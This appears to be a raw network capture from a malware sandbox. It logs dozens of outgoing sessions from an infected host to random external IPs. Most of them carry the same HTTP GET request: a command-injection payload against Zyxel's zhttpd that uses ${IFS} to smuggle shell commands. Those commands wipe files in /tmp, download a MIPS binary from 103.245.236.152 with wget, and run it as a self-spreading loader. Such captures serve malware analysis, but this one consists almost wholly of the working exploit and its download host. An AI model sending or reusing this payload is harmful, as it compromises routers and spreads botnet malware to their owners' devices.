                                          Jan 14, 2024 15:46:31.334105015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8061192.168.2.2335214191.121.121.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334136009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8062192.168.2.233399057.180.239.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334155083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8063192.168.2.2338652115.38.2.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334197998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8064192.168.2.2345510114.78.125.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334214926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8065192.168.2.23369304.205.184.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334248066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8066192.168.2.2341308178.151.226.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334284067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8067192.168.2.235497674.252.45.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334312916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8068192.168.2.2360984153.179.186.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334342003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8069192.168.2.233602692.212.143.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334388971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8070192.168.2.234418675.59.243.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334410906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8071192.168.2.2354900122.215.155.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334454060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8072192.168.2.2342866120.38.49.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334479094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8073192.168.2.234945076.195.110.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334515095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8074192.168.2.235953451.199.122.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334537029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8075192.168.2.2340042126.56.114.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334556103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8076192.168.2.235582441.227.45.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334590912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8077192.168.2.234996680.214.129.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334614038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8078192.168.2.234865813.20.254.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334641933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8079192.168.2.2348894221.80.38.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334671021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8080192.168.2.234647652.229.200.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334678888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8081192.168.2.2337682170.58.194.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334700108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8082192.168.2.235791647.35.179.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334748983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8083192.168.2.2349298143.11.160.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334772110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8084192.168.2.23609788.21.114.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334805012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8085192.168.2.233410838.186.193.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334836960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8086192.168.2.2359156164.158.89.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334872007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8087192.168.2.2341456112.85.167.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334891081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8088192.168.2.2334508131.64.216.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334928036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8089192.168.2.2339948117.228.163.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.334955931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8090192.168.2.2335886120.77.149.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335011005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8091192.168.2.234534498.172.21.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335036993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8092192.168.2.235145248.5.238.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335048914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8093192.168.2.2354868171.75.232.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335084915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8094192.168.2.2342810110.120.46.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335100889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8095192.168.2.23462485.250.92.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335165977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8096192.168.2.23486421.90.122.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335186958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8097192.168.2.236093862.253.196.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335216045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8098192.168.2.2352020133.243.25.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335247040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8099192.168.2.23605049.85.255.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335270882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8100192.168.2.234229439.71.42.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335285902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8101192.168.2.235947266.16.90.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335311890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8102192.168.2.233748625.237.148.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335335970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8103192.168.2.2352620104.140.15.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335393906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8104192.168.2.2353282186.13.94.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335411072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8105192.168.2.2356424204.147.244.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335423946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8106192.168.2.234704032.235.152.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335464001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8107192.168.2.2357750185.167.166.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335495949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8108192.168.2.2336244184.124.172.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335540056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8109192.168.2.2334196217.238.0.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335570097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8110192.168.2.2337322221.231.39.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335585117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8111192.168.2.234323282.139.176.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335624933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8112192.168.2.2336374219.53.36.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335655928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8113192.168.2.234235860.144.244.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335676908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8114192.168.2.2346010155.99.78.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335686922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8115192.168.2.235268054.82.143.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335715055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8116192.168.2.235964492.92.164.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335722923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8117192.168.2.2360394192.141.130.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335756063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8118192.168.2.235027262.76.216.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335781097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8119192.168.2.234655080.25.250.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335819006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8120192.168.2.233829234.202.236.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335848093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8121192.168.2.233578448.174.72.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335874081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8122192.168.2.234436844.151.49.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:31.335918903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8123192.168.2.2348556164.179.23.88443
                                          TimestampBytes transferredDirectionData
